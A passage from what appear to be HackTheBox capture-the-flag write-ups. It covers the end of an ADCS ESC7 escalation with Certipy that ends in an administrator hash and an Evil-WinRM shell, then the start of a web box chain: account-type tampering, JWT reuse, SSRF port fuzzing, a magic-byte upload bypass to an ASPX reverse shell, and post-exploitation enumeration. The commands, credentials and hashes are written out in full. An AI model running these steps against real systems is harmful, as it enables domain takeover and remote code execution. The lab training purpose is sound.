---- ------------- ------ ----
d-r--- 7/27/2023 8:24 AM Desktop
d-r--- 7/27/2023 8:23 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
Directory: C:\Users\Raven\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/12/2024 9:21 PM 34 user.txt
There’s no other user directories, and the web directory doesn’t have anything else interesting.
With a Windows domain, the next thing to check used to be Bloodhound, but lately it’s worth checking Advice Directory Certificate Services (ADCS) as well, and that’s quick, so I’ll start there. This can be done by uploading Certify or remotely with Certipy. I find Certipy easier.
I’ll look for vulnerable templates:
oxdf@hacky$ certipy find -dc-ip 10.10.11.236 -ns 10.10.11.236 -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates
The last line is the most important! Raven has dangerous permissions, with the label ESC7.
ESC7 is when a user has either the “Manage CA” or “Manage Certificates” access rights on the certificate authority itself. Raven has ManageCa rights (shown in the output above).
The steps to exploit this are on the Certipy README.
First, I’ll need to use the Manage CA permission to give Raven the Manage Certificates permission:
oxdf@hacky$ certipy ca -ca manager-DC01-CA -add-officer raven -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'
Now Raven shows up there where they didn’t before:
oxdf@hacky$ certipy find -dc-ip 10.10.11.236 -ns 10.10.11.236 -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout
...[snip]...
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
...[snip]...
This gets reset periodically, so if I find some step breaks while exploiting, it’s worth going back to see if that is why.
The first step is to request a certificate based on the Subordinate Certification Authority (SubCA) template provided by ADCS. The SubCA template serves as a predefined set of configurations and policies governing the issuance of certificates.
oxdf@hacky$ certipy req -ca manager-DC01-CA -target dc01.manager.htb -template SubCA -upn administrator@manager.htb -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 13
Would you like to save the private key? (y/N) y
[*] Saved private key to 13.key
[-] Failed to request certificate
This fails, but it saves the private key involved. Then, using the Manage CA and Manage Certificates privileges, I’ll use the ca
subcommand to issue the request:
oxdf@hacky$ certipy ca -ca manager-DC01-CA -issue-request 13 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate
Now, the issued certificate can be retrieved using the req
command:
oxdf@hacky$ certipy req -ca manager-DC01-CA -target dc01.manager.htb -retrieve 13 -username raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Rerieving certificate with ID 13
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '13.key'
[*] Saved certificate and private key to 'administrator.pfx'
With this certificate as the administrator user, the easiest way to get a shell is to use it to get the NTLM hash for the user with the auth
command. This requires the VM and target times to be in sync, with otherwise leads to this failure:
oxdf@hacky$ certipy auth -pfx administrator.pfx -dc-ip manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[-] Got error: nameserver manager.htb is not an IP address or valid https URL
[-] Use -debug to print a stacktrace
I’ll use ntpdate
to sync my VM’s time to Manager’s:
oxdf@hacky$ sudo ntpdate 10.10.11.236
13 Mar 17:17:40 ntpdate[252490]: step time server 10.10.11.236 offset +25191.022331 sec
Now it works, leaking the hash:
oxdf@hacky$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
With the hash, I can get a shell as administrator using Evil-WinRM:
oxdf@hacky$ evil-winrm -i manager.htb -u administrator -H ae5064c2f62317332c88629e025924ef
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
And grab root.txt
:
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
589f36d6************************
Appsanity starts with two websites that share a JWT secret, and thus I can get a cookie from one and use it on the other. On the first, I’ll register an account, and abuse a hidden input vulnerability to get evelated privilieges as a doctor role. Then I’ll use that cookie on the other site to get access, where I find a serverside request forgery, as well as a way to upload PDFs. I’ll bypass a filter to upload a webshell, and use the SSRF to reach the internal management page and trigger a reverse shell. From there, I’ll find the location of credentials in a .NET application, and extract a password from the registry to get another shell. Finally, I’ll reverse a C++ binary using ProcMon, Ghidra, and x64dbg to figure out a location where I could write a DLL and trigger it’s being loaded, giving shell as administrator.
Name | Appsanity Play on HackTheBox |
---|---|
Release Date | 28 Oct 2023 |
Retire Date | 09 Mar 2024 |
OS | Windows |
Base Points | Hard [40] |
Rated Difficulty | |
Radar Graph | |
02:23:37 | |
03:57:12 | |
Creator |
nmap
finds three open TCP ports, HTTP (80), HTTPS (443), and WinRM (5985):
oxdf@hacky$ nmap -p- --min-rate 10000 10.10.11.238
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 14:02 EST
Nmap scan report for 10.10.11.238
Host is up (0.11s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
443/tcp open https
5985/tcp open wsman
Nmap done: 1 IP address (1 host up) scanned in 13.68 seconds
oxdf@hacky$ nmap -p 80,443,5985 -sCV 10.10.11.238
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 14:04 EST
Nmap scan report for 10.10.11.238
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://meddigi.htb/
443/tcp open https?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.57 seconds
This is clearly a Windows host, Windows 10/11 or Server 2016+. The website on port 80 is redirecting to https://meddigi.htb
. The site on 443 returns nothing.
Visiting http://10.10.11.238
immediately returns a 302 redirect to https://meddigi.htb
, just as nmap
showed. Interetingly, visiting https://10.10.11.238
just crashes:
I suspect they meant to have a redirect up here as well.
I’ll try to fuzz subdomains on both HTTP and HTTPS. On HTTP, it finds nothing:
oxdf@hacky$ ffuf -u http://10.10.11.238 -H "Host: FUZZ.meddigi.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.11.238
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.meddigi.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
:: Progress: [19966/19966] :: Job [1/1] :: 357 req/sec :: Duration: [0:00:57] :: Errors: 0 ::
On HTTPS, every single request fails in an error:
oxdf@hacky$ ffuf -u https://10.10.11.238 -H "Host: FUZZ.meddigi.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : https://10.10.11.238
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.meddigi.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
:: Progress: [19966/19966] :: Job [1/1] :: 89 req/sec :: Duration: [0:03:44] :: Errors: 19966 ::
I’ll add meddigi.htb
to my /etc/hosts
file:
10.10.11.238 meddigi.htb
If I now fuzz again targeting https://meddigi.htb
, it doesn’t error, and does find another subdomain:
oxdf@hacky$ ffuf -u https://meddigi.htb -H "Host: FUZZ.meddigi.htb" -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -mc all -ac
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : https://meddigi.htb
:: Wordlist : FUZZ: /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.meddigi.htb
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
________________________________________________
portal [Status: 200, Size: 2976, Words: 1219, Lines: 57, Duration: 3315ms]
:: Progress: [19966/19966] :: Job [1/1] :: 88 req/sec :: Duration: [0:04:02] :: Errors: 0 ::
I’ll add portal.meddigi.htb
to my hosts
file as well.
The TLS certificate on 443 shows the same hostname, meddigi.htb
:
The site is for a medical consulting company:
There’s not too much of interest on the site, but I can register an account. On doing so and logging in, there’s a profile page (/Profile
):
Not much here. I can send a message to the supervisors, but no XSS payloads seem to connect back.
The HTTP response headers show again that this is IIS:
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
Strict-Transport-Security: max-age=2592000
Set-Cookie: .AspNetCore.Mvc.CookieTempDataProvider=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; samesite=lax; httponly
Date: Wed, 28 Feb 2024 19:53:24 GMT
On the initial visit (before logging in) it sets a blank .AspNetCore.Mvc.CookieTempDataProvider
cookie, which suggests this is an ASP .NET application. That cookie does get set while browsing around the site.
I’m not able to guess any extensions. On a bad page, it just redirects to /Home
.
On logging in, another cookie is set:
HTTP/2 302 Found
Location: /Profile
Server: Microsoft-IIS/10.0
Strict-Transport-Security: max-age=2592000
Set-Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6IjB4ZGZAbWVkZGlnaS5odGIiLCJuYmYiOjE3MDkxNTE0MzgsImV4cCI6MTcwOTE1NTAzOCwiaWF0IjoxNzA5MTUxNDM4LCJpc3MiOiJNZWREaWdpIiwiYXVkIjoiTWVkRGlnaVVzZXIifQ.mMHBaemx7FjdgSR90NdIgfLPoB9_fjbrEqvGFJbqokc; expires=Wed, 28 Feb 2024 22:17:18 GMT; path=/; secure; samesite=strict; httponly
Date: Wed, 28 Feb 2024 20:17:18 GMT
That’s a JWT set as the access_token
, which decodes to:
{
"unique_name": "7",
"email": "0xdf@meddigi.htb",
"nbf": 1709151438,
"exp": 1709155038,
"iat": 1709151438,
"iss": "MedDigi",
"aud": "MedDigiUser"
}
I’ll run feroxbuster
against the site, using a lowercase wordlist as IIS isn’t case sensitive. It doesn’t return anything I don’t already know about:
oxdf@hacky$ feroxbuster -u https://meddigi.htb -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://meddigi.htb
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
302 GET 2l 10w 147c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 514l 1889w 32809c https://meddigi.htb/
200 GET 8l 14w 194c https://meddigi.htb/error
200 GET 514l 1889w 32809c https://meddigi.htb/home
302 GET 0l 0w 0c https://meddigi.htb/profile => https://meddigi.htb/Home
200 GET 108l 472w 7847c https://meddigi.htb/signup
200 GET 76l 204w 3792c https://meddigi.htb/signin
400 GET 6l 26w 324c https://meddigi.htb/error%1F_log
[####################] - 1m 26584/26584 0s found:7 errors:0
[####################] - 1m 26584/26584 420/s https://meddigi.htb/
/error
returns:
The site presents a login form:
To log in, I’ll need an email and “Doctor Ref.Number”.
The HTTP response headers look exactly the same as the main site:
HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
Strict-Transport-Security: max-age=2592000
Set-Cookie: .AspNetCore.Mvc.CookieTempDataProvider=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/; samesite=lax; httponly
Date: Wed, 28 Feb 2024 20:12:01 GMT
feroxbuster
finds a couple endpoints that require auth (302 redirects to /Login
), but not much else:
oxdf@hacky$ feroxbuster -u https://portal.meddigi.htb -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -k
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.9.3
───────────────────────────┬──────────────────────
🎯 Target Url │ https://portal.meddigi.htb
🚀 Threads │ 50
📖 Wordlist │ /opt/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.9.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🏁 HTTP methods │ [GET]
🔓 Insecure │ true
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
302 GET 2l 10w 155c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 57l 162w 2976c https://portal.meddigi.htb/
200 GET 57l 162w 2976c https://portal.meddigi.htb/login
200 GET 8l 14w 194c https://portal.meddigi.htb/error
302 GET 0l 0w 0c https://portal.meddigi.htb/profile => https://portal.meddigi.htb/Login
302 GET 0l 0w 0c https://portal.meddigi.htb/equipment => https://portal.meddigi.htb/Login
302 GET 0l 0w 0c https://portal.meddigi.htb/scheduler => https://portal.meddigi.htb/Login
400 GET 6l 26w 324c https://portal.meddigi.htb/error%1F_log
[####################] - 1m 26584/26584 0s found:7 errors:0
[####################] - 1m 26584/26584 425/s https://portal.meddigi.htb/
Looking at the POST request to register an account, there’s an interesting field in the body:
POST /Signup/SignUp HTTP/2
Host: meddigi.htb
Cookie: .AspNetCore.Antiforgery.ML5pX7jOz00=CfDJ8G5wpJNGr61AqaSs4NeQzGECU5I-qpOUJ4m4QT6B8N0jzDeFYOrDeYjnpAqfLxfAKWZz-odFKvD48Ht6m4HwKivMzkuFPoGFpANf8KiNS5FbqRMt7Z89Z7Ky3hDJyB9BKKEYWdvEfnZu1lZbgg3_K_M
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 338
Origin: https://meddigi.htb
Referer: https://meddigi.htb/signup
Name=df&LastName=df&Email=0xdf%40meddigi.htb&Password=0xdf0xdf&ConfirmPassword=0xdf0xdf&DateOfBirth=2000-01-01&PhoneNumber=1111111111&Country=usa&Acctype=1&__RequestVerificationToken=CfDJ8G5wpJNGr61AqaSs4NeQzGHnf8qh8M3yVMWpESf7wR0J44Sj7nle56Z34HuOgerWHBH4HwQFqKqIakDHJ9mPiFvbc2a7ZP4s6KXa1yeinoEqXfL1dSiyLqXl-adU1xY8TomxlMbnRO4CyHUMk4ypUKA
In addition to the data entered in the form, there’s a Acctype
parameter. That comes from a hidden input
tag in the HTML form:
<input type="hidden" data-val="true" data-val-required="The Acctype field is required." id="Acctype" name="Acctype" value="1" />
The response to a successful login is a 302 redirect to /Signin
.
I’ll send this request to Burp Repeater and mess with that a bit. If I set it to 0, the response is a 302 redirect to /Signup
. This implies failure registering.
If I change that to 2, it redirects to /Signin
:
Going up to 3 leads back to /Signup
, so it seems like 1 and 2 are the only valid values here.
If I log in with the account created with type 2, now it shows the account is a Doctor:
There’s not much else here. I can add patients to be supervised, but it doesn’t seem to do much.
The tech stacks of the two websites seem very similar. Thinking about the JWT that gets set when I log in on the main site, if the portal site was written by the same developers, it could have used the same signing secret and the same cookie name. If that’s the case, the cookie generated by one would be valid on the other.
I’ll go into the dev tools and create a cookie for portal.meddigi.htb
, placing the doctor level cookie from the other site in there:
On refreshing, the browser redirects to /Profile
:
It’s the same info as the other site as well!
Each of the items in the menu bar on the left have different forms that can be submitted. The two most interesting are “Issue Prescriptions” (/Prescriptions
) and “Upload Report” (/examreport
).
The Prescriptions page is interesting because one of the items it takes is a link:
Any time I can submit a link to a site it’s worth digging into. If I put in my host as the link:
On hitting submit, it contacts my Python webserver:
10.10.11.238 - - [28/Feb/2024 20:58:55] code 404, message File not found
10.10.11.238 - - [28/Feb/2024 20:58:55] "GET /prescriptions HTTP/1.1" 404 -
And displays the result:
If I create that page:
oxdf@hacky$ echo "<h1>Test Page</h1>" > prescriptions
On submitting again, it shows the page:
Looks like a solid server-side request forgery (SSRF).
The Reporting page allows for file upload:
I’ll fill it out, and after passing all the client-side validation, submit, and it returns:
If I use a PDF, it shows:
I’ve already shown an SSRF above in the Prescriptions panel. I’ll use that to fuzz listening ports on the internal network, in this case on localhost.
This command is a bit tricky to build, so I’ll work up to it slowly. I’ll start by getting rid of headers in the request to make sure I know which ones actually matter. I’ll submit in the site, and send the request to Repeater. Then I can get rid of a couple headers, send, and make sure the response is the same. That confirms I can get rid of those headers. Content-Type
is a good one to notice - without that the request fails. I’ll need that when I craft a ffuf
command.
In Repeater, I’ll look at what happens with it requests a link on a listening port on my host:
It’s a 200 response, with the actual HTML from my host in the body. It’s also a very fast response, about 3.5 seconds.
If I change that to a port that’s not listening (81), it returns a 302 to /Error
:
It also takes 2.7 seconds, way longer! That makes sense, as it’s trying to connect and waiting for a timeout.
My initial gut was to scan all 65535 ports, but that proved way too slow, especially because I want to fuzz on both HTTP and HTTPS. I’ll start with a wordlist from SecLists, common-http-ports.txt
. I’ll need to include:
-d 'Email=0xdf@meddigi.htb&Link=http(s)://127.0.0.1:FUZZ'
- The data in the POST request.-w common-http-ports.txt
- The wordlist.-u https://portal.meddigi.htb/Prescriptions/SendEmail
- The URL to target.-H 'Content-Type: application/x-www-form-urlencoded
- The Content-Type
header.- mc 200
- Filter out to show only HTTP 200 responses-b "access_token=$token"
- My cookie, which I’m storing in a Bash variable to make the command more mangagable.On HTTPS it finds nothing:
oxdf@hacky$ ffuf -d 'Email=0xdf@meddigi.htb&Link=https://127.0.0.1:FUZZ' -w /opt/SecLists/Discovery/Infrastructure/common-http-ports.txt -u 'https://portal.meddigi.htb/Prescriptions/SendEmail' -H 'Content-Type: application/x-www-form-urlencoded' -mc 200 -b "access_token=$token"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : https://portal.meddigi.htb/Prescriptions/SendEmail
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Infrastructure/common-http-ports.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Header : Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6IjB4ZGYyQG1lZGRpZ2kuaHRiIiwibmJmIjoxNzA5MzIyMzM5LCJleHAiOjE3MDkzMjU5MzksImlhdCI6MTcwOTMyMjMzOSwiaXNzIjoiTWVkRGlnaSIsImF1ZCI6Ik1lZERpZ2lVc2VyIn0.ofzJS2ZE7OOwdsRRZ98daXdA8OkQ3kbEuNYEtRnZLR4
:: Data : Email=0xdf@meddigi.htb&Link=https://127.0.0.1:FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________
:: Progress: [35/35] :: Job [1/1] :: 5 req/sec :: Duration: [0:00:08] :: Errors: 0 ::
On HTTP, it finds 8080:
oxdf@hacky$ ffuf -d 'Email=0xdf@meddigi.htb&Link=http://127.0.0.1:FUZZ' -w /opt/SecLists/Discovery/Infrastructure/common-http-ports.txt -u 'https://portal.meddigi.htb/Prescriptions/SendEmail' -H 'Content-Type: application/x-www-form-urlencoded' -mc 200 -b "access_token=$token"
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : POST
:: URL : https://portal.meddigi.htb/Prescriptions/SendEmail
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Infrastructure/common-http-ports.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Header : Cookie: access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjciLCJlbWFpbCI6IjB4ZGYyQG1lZGRpZ2kuaHRiIiwibmJmIjoxNzA5MzIyMzM5LCJleHAiOjE3MDkzMjU5MzksImlhdCI6MTcwOTMyMjMzOSwiaXNzIjoiTWVkRGlnaSIsImF1ZCI6Ik1lZERpZ2lVc2VyIn0.ofzJS2ZE7OOwdsRRZ98daXdA8OkQ3kbEuNYEtRnZLR4
:: Data : Email=0xdf@meddigi.htb&Link=http://127.0.0.1:FUZZ
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200
________________________________________________
8080 [Status: 200, Size: 2060, Words: 688, Lines: 54, Duration: 3565ms]
:: Progress: [35/35] :: Job [1/1] :: 1 req/sec :: Duration: [0:00:20] :: Errors: 1 ::
Back in the browser, I’ll submit http://127.0.0.1:8080
as the prescription url:
Interestingly, not only does it show a line that’s always there, but the second line in this table is a report I’ve recently uploaded! If I scroll over, there’s a link to the PDF:
I can grab the URL from that, and back in Repeater, fetch the PDF:
At this point, I have access to files that I upload.
As this is a .NET webserver, I would like to upload an ASPX webshell and see if I can trigger it via the SSRF. I’ll upload my PDF again, and get that request into Repeater. I’ve observed that the filename it gets saved at seems to prepend some data but then end in _[original file name]
. My first question is if I can change the file extension to .aspx
and get it to still upload. I’ll not change the payload, but only the form data filename
:
The response looks just like the unmodified request! I’ll use the SSRF to load http://127.0.0.1:8080
and see that the file does exist at the .aspx
extension. I can pull the file too:
Back in the Repeater tab submitting the PDF, I’ll try to remove the PDF body and replace it with text. If I remove the entire thing and just have “0xdf was here”, it still looks successful:
But the file isn’t there with the SSRF.
However, if I leave the start of the PDF (the “magic bytes”) and replace the body with my text like this:
Then there is a new link, and I can fetch it over the SSRF:
So the webserver seems to be validinting the file based on the magic bytes.
I’ll grab an ASPX reverse shell from GitHub, and put it in place of my text, making sure to update the callback IP and port. To make things easier, I’ll update the patient name to “reverseshell” (spaces break it). I’ll upload it, and fetch the admin page via the SSRF in the web browser:
The report link is https://portal.meddigi.htb/ViewReport.aspx?file=887947b0-f4ba-4939-8181-7d9d195b7d21_dummy.aspx
, so I’ll update my SSRF trigger in Repeater (with nc
listening):
When I send, it just hangs, but a few seconds later at nc
:
oxdf@hacky$ rlwrap -cAr nc -lnvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.238 62885
Spawn Shell...
Microsoft Windows [Version 10.0.19045.3570]
(c) Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv> whoami
appsanity\svc_exampanel
The user flag is on the exampanel user’s desktop:
c:\Users\svc_exampanel\Desktop> type user.txt
1198a84a************************
Running powershell
converts this shell from cmd
to powershell
, which is also nice.
There are a handful of other users on the box:
PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/18/2023 6:08 PM Administrator
d----- 9/24/2023 11:16 AM devdoc
d-r--- 9/15/2023 6:59 AM Public
d----- 10/18/2023 6:40 PM svc_exampanel
d----- 10/17/2023 3:05 PM svc_meddigi
d----- 10/18/2023 7:10 PM svc_meddigiportal
The svc_exampanel user can’t access any of these directories.
The net user
command gives similar results:
PS C:\Users> net user
User accounts for \\APPSANITY
-------------------------------------------------------------------------------
Administrator DefaultAccount devdoc
Guest svc_exampanel svc_meddigi
svc_meddigiportal WDAGUtilityAccount
The command completed successfully.
The C:\inetpub
directory has the IIS-related files:
PS C:\inetpub> ls
Directory: C:\inetpub
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/15/2023 7:22 AM custerr
d----- 3/1/2024 1:14 PM Databases
d----- 9/24/2023 8:49 AM ExaminationPanel
d----- 10/23/2023 12:41 PM history
d----- 9/15/2023 7:24 AM logs
d----- 9/24/2023 8:50 AM MedDigi
d----- 9/24/2023 9:15 AM MedDigiPortal
d----- 9/15/2023 7:22 AM temp
d----- 9/16/2023 9:58 AM wwwroot
My guess is that MedDigi
is the main site, MedDigiPortal
is the portal site, and ExaminationPanel
is the private site on 8080. This user can’t access the other sites.
In ExaminatinPanel
, there’s another directory of the same name, which has:
PS C:\inetpub\ExaminationPanel\ExaminationPanel> ls
Directory: C:\inetpub\ExaminationPanel\ExaminationPanel
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/26/2023 7:30 AM bin
d----- 3/1/2024 1:45 PM Reports
d----- 3/1/2024 1:10 PM tmp
-a---- 9/24/2023 8:46 AM 409 Error.aspx
-a---- 9/24/2023 8:46 AM 105 Global.asax
-a---- 9/24/2023 8:46 AM 1863 Index.aspx
-a---- 9/24/2023 8:46 AM 363 ViewReport.aspx
-a---- 10/18/2023 7:03 PM 2883 Web.config
Reports
has the uploaded reports (though my webshell has been cleaned up, presumably by some HTB cleanup script).
bin
has the executables that run the site:
PS C:\inetpub\ExaminationPanel\ExaminationPanel\bin> ls
Directory: C:\inetpub\ExaminationPanel\ExaminationPanel\bin
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/24/2023 8:49 AM roslyn
d----- 9/24/2023 8:49 AM x64
d----- 9/24/2023 8:49 AM x86
-a---- 9/24/2023 8:46 AM 4991352 EntityFramework.dll
-a---- 9/24/2023 8:46 AM 591752 EntityFramework.SqlServer.dll
-a---- 9/24/2023 8:46 AM 13824 ExaminationManagement.dll
-a---- 9/24/2023 8:46 AM 40168 Microsoft.CodeDom.Providers.DotNetCompilerPlatform.dll
